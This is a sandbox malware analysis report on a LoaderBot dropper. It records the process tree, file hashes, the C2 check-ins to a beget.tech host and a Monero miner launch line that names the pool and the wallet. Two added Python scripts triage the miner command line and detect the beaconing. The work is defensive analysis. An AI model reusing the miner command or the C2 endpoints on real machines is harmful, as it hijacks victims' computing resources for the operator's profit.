Analysis

  • max time kernel
    157s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    29/04/2022, 15:41 UTC

General

  • Target

    yhrtfweadqwa.exe

  • Size

    4.0MB

  • MD5

    9e5ab0afc9796bbed8ca5a2f683aae01

  • SHA1

    7063aaa1901e0ae659c32d33b866684d8282b0d7

  • SHA256

    648e092b2cea4d5640f151203911536056abcb6a16d0de391528e9bd8842b940

  • SHA512

    7e00d93ad0b2c54e2a6a86eec37bf654c580ecd68804fa3275fe3072db8eb9ecdcf06c4e01ac74907a631427a418c3a4160625c659fa5615c9ef47052a3dbf30

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a .NET loader that downloads and executes cryptocurrency miners. In this run the submitted sample writes and starts memory_inject.exe, which polls a C2 (xxx01xzb.beget.tech) and launches Driver.exe as a Monero miner against pool.supportxmr.com; the first miner instance (PID 1628) crashed and a second one (PID 4340) was started.

  • suricata: ET MALWARE CerberTear Ransomware CnC Checkin

    Suricata network alert. The rule name is the family the signature was written for; the only HTTP traffic attributed to the sample in this run is memory_inject.exe's GET /cmd.php?hwid=... check-in to xxx01xzb.beget.tech (see Network), so read this as a URI-pattern match on that check-in, not as evidence of CerberTear.

  • LoaderBot executable 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The signature's generic text calls this likely ransomware behaviour; nothing else in this run supports that (no file encryption, no ransom note), and the payload actually launched is a miner.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\yhrtfweadqwa.exe
    "C:\Users\Admin\AppData\Local\Temp\yhrtfweadqwa.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Users\Public\Videos\memory_inject.exe
      "C:\Users\Public\Videos\memory_inject.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1628
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1628 -s 764
          4⤵
          • Program crash
          PID:2412
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4340
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 460 -p 1628 -ip 1628
    1⤵
      PID:1096
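
The Driver.exe command line in the process tree is the most informative line in this report: an XMRig-style launch naming the pool (-o), the wallet (-u), a placeholder password (-p x), keep-alive (-k), the dev fee cut to its minimum (--donate-level=1) and a single worker thread (-t 1), which keeps CPU use low enough to go unnoticed on a victim. The script below is an added example by the editor, not code from the report or from the LoaderBot authors. It parses such a command line into its fields, shape-checks the wallet as a Monero address and emits finding tags. The flag names are XMRig's documented ones; KNOWN_POOLS, the port list and the tag names are assumptions for the demo, and nothing here proves the binary is an unmodified XMRig build.

```python
"""Parse and triage a miner-style command line such as the Driver.exe launch.

Added example, not from the sandbox report. Flag names follow XMRig's CLI
(-o/--url, -u/--user, -p/--pass, -k/--keepalive, -t/--threads,
--donate-level); KNOWN_POOLS and the finding tags are demo assumptions.
"""
import shlex
from urllib.parse import urlsplit

# Command line copied from the process tree (PIDs 1628 and 4340).
DRIVER_CMDLINE = (
    r'"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" '
    "-o pool.supportxmr.com:3333 "
    "-u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH "
    "-p x -k -v=0 --donate-level=1 -t 1"
)

# Base58 alphabet (no 0, O, I, l), as used by Monero addresses.
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")
# Long-form spellings folded onto the short flag they are equivalent to.
ALIASES = {"--url": "-o", "--user": "-u", "--pass": "-p",
           "--threads": "-t", "--keepalive": "-k"}
FLAGS_WITH_VALUE = {"-o", "-u", "-p", "-t", "--donate-level"}
# Public Monero pool domains; an assumption for the demo, extend as needed.
KNOWN_POOLS = ("supportxmr.com", "nanopool.org", "hashvault.pro", "moneroocean.stream")


def is_monero_address(s):
    """Shape check only (no checksum): standard addresses are 95 base58 chars
    starting with 4, subaddresses start with 8, integrated addresses are 106."""
    return len(s) in (95, 106) and s[:1] in ("4", "8") and set(s) <= BASE58


def split_pool(value):
    """'host:port' or 'stratum+tcp://host:port' -> (host, port)."""
    target = value if "://" in value else "//" + value
    u = urlsplit(target)
    return u.hostname, u.port


def parse_miner_cmdline(cmdline):
    # posix=False keeps Windows backslashes literal; the quotes around the
    # image path survive in the token, so strip them afterwards.
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    info = {"image": toks[0], "pool": None, "wallet": None, "password": None,
            "threads": None, "donate_level": None, "keepalive": False,
            "unknown": []}
    i = 1
    while i < len(toks):
        tok = toks[i]
        key, _, inline = tok.partition("=")   # handles --donate-level=1
        key = ALIASES.get(key, key)
        if key in FLAGS_WITH_VALUE:
            if inline:
                val = inline
            else:
                i += 1
                val = toks[i] if i < len(toks) else ""
            if key == "-o":
                info["pool"] = split_pool(val)
            elif key == "-u":
                info["wallet"] = val
            elif key == "-p":
                info["password"] = val
            elif key == "-t":
                info["threads"] = int(val) if val.isdigit() else val
            else:
                info["donate_level"] = int(val) if val.isdigit() else val
        elif key == "-k":
            info["keepalive"] = True
        else:
            info["unknown"].append(tok)      # e.g. -v=0, left for the analyst
        i += 1
    return info


def triage(cmdline):
    """Return the parsed fields plus a list of short finding tags."""
    info = parse_miner_cmdline(cmdline)
    findings = []
    host, port = info["pool"] or (None, None)
    if host and host.endswith(KNOWN_POOLS):
        findings.append("known_monero_pool")
    if port in (3333, 4444, 5555, 7777, 8080):
        findings.append("stratum_style_port")
    if info["wallet"] and is_monero_address(info["wallet"]):
        findings.append("monero_wallet")
    if info["threads"] == 1:
        findings.append("single_thread_throttle")   # keeps CPU use inconspicuous
    if info["donate_level"] == 1:
        findings.append("dev_fee_minimised")
    if "\\AppData\\" in info["image"] or "\\Users\\Public\\" in info["image"]:
        findings.append("user_writable_path")
    return {"parsed": info, "findings": findings}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(DRIVER_CMDLINE), indent=2))
```

On DRIVER_CMDLINE this yields the pool as (pool.supportxmr.com, 3333), a 95-character wallet that passes the Monero shape check, and the -v=0 token left under "unknown" for manual review rather than guessed at. The wallet string is the durable indicator here: paths, file names and even the pool can change between builds, while the payout address is what the operator cannot rotate without losing revenue.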

    Network

    • (remote in US; Cortana/Bing background traffic of the sandbox VM, not attributed to a sample process)
      GET
      https://www.bing.com/manifest/threshold.appcache
      Remote address:
      13.107.21.200:443
      Request
      GET /manifest/threshold.appcache HTTP/1.1
      Accept: */*
      Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      Origin: https://www.bing.com
      Accept-Encoding: gzip, deflate, br
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Host: www.bing.com
      Connection: Keep-Alive
      Cookie: SRCHUID=V=2&GUID=9CC9F79AE5A64831AA8CE66EAAC74944&dmnchg=1; SRCHD=AF=NOFORM; SUID=M; SRCHUSR=DOB=20220414; SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=532f3cd9&IPMID=1649985998964; CortanaAppUID=7CD8473CB7C88EB5F6C2E41FC990803D; MUID=246F28A4DF47460497838A5CBF65C8B6; _SS=CPID=1649987670823&AC=1&CPH=035e8e23; MUIDB=246F28A4DF47460497838A5CBF65C8B6
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 933
      Content-Type: text/cache-manifest; charset=utf-8
      Content-Encoding: br
      Vary: Accept-Encoding
      P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
      Set-Cookie: _EDGE_S=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; domain=.bing.com; path=/; HttpOnly
      Set-Cookie: MUIDB=246F28A4DF47460497838A5CBF65C8B6; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; HttpOnly
      Set-Cookie: _SS=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; domain=.bing.com; path=/; secure; SameSite=None
      Set-Cookie: SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=76ca0aae&IPMID=1649987670823; domain=.bing.com; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; secure; SameSite=None
      X-SNR-Routing: 1
      X-XSS-Protection: 0
      X-Cache: CONFIG_NOCACHE
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      X-MSEdge-Ref: Ref A: DE60EB1B6B324D5A851D95D0E936FC2D Ref B: AMBEDGE0809 Ref C: 2022-04-29T15:41:47Z
      Date: Fri, 29 Apr 2022 15:41:46 GMT
    • (remote in US; Cortana/Bing background traffic of the sandbox VM, not attributed to a sample process)
      GET
      https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      Remote address:
      13.107.21.200:443
      Request
      GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1
      Accept: */*
      Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      Accept-Encoding: gzip, deflate, br
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Host: www.bing.com
      Connection: Keep-Alive
      Cookie: SRCHUID=V=2&GUID=9CC9F79AE5A64831AA8CE66EAAC74944&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220414; SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=76ca0aae&IPMID=1649987670823; CortanaAppUID=7CD8473CB7C88EB5F6C2E41FC990803D; MUID=246F28A4DF47460497838A5CBF65C8B6; _SS=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; _EDGE_S=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; MUIDB=246F28A4DF47460497838A5CBF65C8B6
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 72023
      Content-Type: text/html; charset=utf-8
      Content-Encoding: br
      Vary: Accept-Encoding
      P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
      Set-Cookie: SUID=M; domain=.bing.com; expires=Sat, 30-Apr-2022 15:41:47 GMT; path=/; secure; HttpOnly; SameSite=None
      Set-Cookie: MUIDB=246F28A4DF47460497838A5CBF65C8B6; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; HttpOnly
      X-SNR-Routing: 1
      X-XSS-Protection: 0
      X-UA-Compatible: IE=edge
      X-Cache: CONFIG_NOCACHE
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      X-MSEdge-Ref: Ref A: 5EA777C8DFD64B7D8D2B40AA6011414C Ref B: AMBEDGE0809 Ref C: 2022-04-29T15:41:47Z
      Date: Fri, 29 Apr 2022 15:41:46 GMT
    • (remote in US; Google Public DNS)
      DNS
      xxx01xzb.beget.tech
      memory_inject.exe
      Remote address:
      8.8.8.8:53
      Request
      xxx01xzb.beget.tech
      IN A
      Response
      xxx01xzb.beget.tech
      IN A
      91.106.207.25
    • (remote in RU; LoaderBot C2 check-in, hwid is a per-host identifier)
      GET
      http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?hwid=E27E20AC HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:41:50 GMT
      Content-Type: text/html
      Content-Length: 3
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • (remote in RU)
      GET
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?timeout=1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:41:50 GMT
      Content-Type: text/html
      Content-Length: 4
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • (remote in RU)
      GET
      http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?hwid=E27E20AC HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:42:50 GMT
      Content-Type: text/html
      Content-Length: 3
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • (remote in RU)
      GET
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?timeout=1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:42:50 GMT
      Content-Type: text/html
      Content-Length: 4
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • (remote in RU)
      GET
      http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?hwid=E27E20AC HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:43:50 GMT
      Content-Type: text/html
      Content-Length: 3
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • (remote in RU)
      GET
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      memory_inject.exe
      Remote address:
      91.106.207.25:80
      Request
      GET /cmd.php?timeout=1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      Host: xxx01xzb.beget.tech
      Response
      HTTP/1.1 200 OK
      Server: nginx-reuseport/1.21.1
      Date: Fri, 29 Apr 2022 15:43:50 GMT
      Content-Type: text/html
      Content-Length: 4
      Connection: keep-alive
      Keep-Alive: timeout=30
      X-Powered-By: PHP/5.6.40
    • (remote in US; Google Public DNS)
      DNS
      pool.supportxmr.com
      Driver.exe
      Remote address:
      8.8.8.8:53
      Request
      pool.supportxmr.com
      IN A
      Response
      pool.supportxmr.com
      IN CNAME
      pool-fr.supportxmr.com
      pool-fr.supportxmr.com
      IN A
      37.187.95.110
      pool-fr.supportxmr.com
      IN A
      91.121.140.167
      pool-fr.supportxmr.com
      IN A
      94.23.23.52
      pool-fr.supportxmr.com
      IN A
      94.23.247.226
      pool-fr.supportxmr.com
      IN A
      149.202.83.171
    • 13.107.21.200:443
      www.bing.com
      tls
      791 B
      7.8kB
      11
      11
    • 13.107.21.200:443
      https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
      tls, http
      5.5kB
      86.7kB
      77
      77

      HTTP Request

      GET https://www.bing.com/manifest/threshold.appcache

      HTTP Response

      200

      HTTP Request

      GET https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init

      HTTP Response

      200
    • 91.106.207.25:80
      http://xxx01xzb.beget.tech/cmd.php?timeout=1
      http
      memory_inject.exe
      1.4kB
      1.8kB
      11
      13

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?timeout=1

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?timeout=1

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC

      HTTP Response

      200

      HTTP Request

      GET http://xxx01xzb.beget.tech/cmd.php?timeout=1

      HTTP Response

      200
    • 94.23.247.226:3333
      pool.supportxmr.com
      Driver.exe
      1.1kB
      845 B
      8
      5
    • 13.89.178.27:443
      322 B
      7
    • 88.221.144.179:80
      322 B
      7
    • 209.197.3.8:80
      322 B
      7
    • 8.8.8.8:53
      xxx01xzb.beget.tech
      dns
      memory_inject.exe
      65 B
      81 B
      1
      1

      DNS Request

      xxx01xzb.beget.tech

      DNS Response

      91.106.207.25

    • 8.8.8.8:53
      pool.supportxmr.com
      dns
      Driver.exe
      65 B
      167 B
      1
      1

      DNS Request

      pool.supportxmr.com

      DNS Response

      37.187.95.110
      91.121.140.167
      94.23.23.52
      94.23.247.226
      149.202.83.171
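
The check-in pattern recorded above is simple: every 60 seconds memory_inject.exe sends GET /cmd.php?hwid=E27E20AC and then GET /cmd.php?timeout=1 to the same host, and the C2 answers with 3- and 4-byte bodies (the bodies themselves are not shown in the report). Two detections fall out of that: a URI-shape match of the kind the Suricata alert in the Signatures section represents, and a behavioural beacon test on cadence and response size that still fires when the script name or parameter is renamed. The script below is an added example by the editor, not part of the sandbox report. Its log line layout (timestamp, process, destination, method, URL, status, response bytes) is an assumption chosen for the demo, and SAMPLE_LOG is constructed from the timestamps, URLs and Content-Length values recorded above, with one of the sandbox's own Bing requests as a control that must not fire.

```python
"""Flag fixed-cadence HTTP check-ins like the cmd.php polling in the report.

Added example, not part of the sandbox report. The log layout is an
assumption for the demo; SAMPLE_LOG is constructed from the report's
timestamps, URLs and Content-Length values plus one benign control line.
"""
import re
import statistics
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proc>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) "
    r"(?P<url>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$"
)

# Constructed sample: three check-in rounds 60 s apart, plus a Bing request
# of the sandbox itself (no process attributed, large body) as a control.
SAMPLE_LOG = """\
2022-04-29T15:41:47Z - 13.107.21.200:443 GET https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init 200 72023
2022-04-29T15:41:50Z memory_inject.exe 91.106.207.25:80 GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC 200 3
2022-04-29T15:41:50Z memory_inject.exe 91.106.207.25:80 GET http://xxx01xzb.beget.tech/cmd.php?timeout=1 200 4
2022-04-29T15:42:50Z memory_inject.exe 91.106.207.25:80 GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC 200 3
2022-04-29T15:42:50Z memory_inject.exe 91.106.207.25:80 GET http://xxx01xzb.beget.tech/cmd.php?timeout=1 200 4
2022-04-29T15:43:50Z memory_inject.exe 91.106.207.25:80 GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20AC 200 3
2022-04-29T15:43:50Z memory_inject.exe 91.106.207.25:80 GET http://xxx01xzb.beget.tech/cmd.php?timeout=1 200 4
"""


def parse_line(line):
    """One log line -> dict, or None when the line does not fit the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["status"] = int(rec["status"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def is_checkin_uri(url):
    """Content-style match on the check-in's URI shape: a cmd.php script that
    takes an hwid parameter. Cheap, but a renamed script evades it."""
    u = urlsplit(url)
    return u.path.endswith("/cmd.php") and "hwid" in parse_qs(u.query)


def find_beacons(lines, min_hits=3, max_jitter=5.0, max_body=64):
    """Group requests by process, host, path and query-key set, then flag groups
    that recur at a near-constant period with tiny responses."""
    groups = {}
    for rec in filter(None, map(parse_line, lines)):
        u = urlsplit(rec["url"])
        q = parse_qs(u.query)
        key = (rec["proc"], u.hostname or "", u.path, tuple(sorted(q)))
        groups.setdefault(key, []).append(rec)

    hits = []
    for (proc, host, path, qkeys), recs in sorted(groups.items()):
        if len(recs) < min_hits:
            continue
        times = sorted(r["ts"] for r in recs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        jitter = max(abs(g - period) for g in gaps)   # deviation from the period
        avg_body = statistics.mean(r["bytes"] for r in recs)
        if period <= 0 or jitter > max_jitter or avg_body > max_body:
            continue
        hwids = sorted({v for r in recs
                        for v in parse_qs(urlsplit(r["url"]).query).get("hwid", [])})
        hits.append({
            "process": proc, "host": host, "path": path, "query_keys": qkeys,
            "count": len(recs), "period_s": period, "avg_body": avg_body,
            "hwid": hwids,
            "signature_match": any(is_checkin_uri(r["url"]) for r in recs),
        })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG.splitlines()):
        print(hit)
```

On the sample both cmd.php groups come back with a 60-second period and 3- to 4-byte average bodies, only the hwid group also carries a signature match, and the Bing control is dropped for having a single hit. In production the max_jitter tolerance matters: the 60-second cadence here is exact because the sandbox ran for under three minutes, while real loaders often add random sleep, so widen the tolerance to what your traffic shows before trusting the count.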

    MITRE ATT&CK Enterprise v6


    Downloads

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

      (the report lists this file twice more with identical size and hashes)

    • C:\Users\Public\Videos\memory_inject.exe

      Filesize

      4.0MB

      MD5

      5c7bc4cc56f6e6acb801210bc6eda798

      SHA1

      541b6f50091fdc17c2bc8d596c0e202b854fb991

      SHA256

      48f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9

      SHA512

      66558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d

      (the report lists this file once more with identical size and hashes)

    • memory/1628-138-0x00000000001D0000-0x00000000001E4000-memory.dmp

      Filesize

      80KB

    • memory/2848-133-0x0000000000460000-0x0000000000860000-memory.dmp

      Filesize

      4.0MB

    • memory/2848-134-0x0000000005200000-0x0000000005266000-memory.dmp

      Filesize

      408KB

    • memory/4340-142-0x00000000004F0000-0x0000000000510000-memory.dmp

      Filesize

      128KB

    • memory/4340-143-0x0000000001FB0000-0x0000000001FD0000-memory.dmp

      Filesize

      128KB
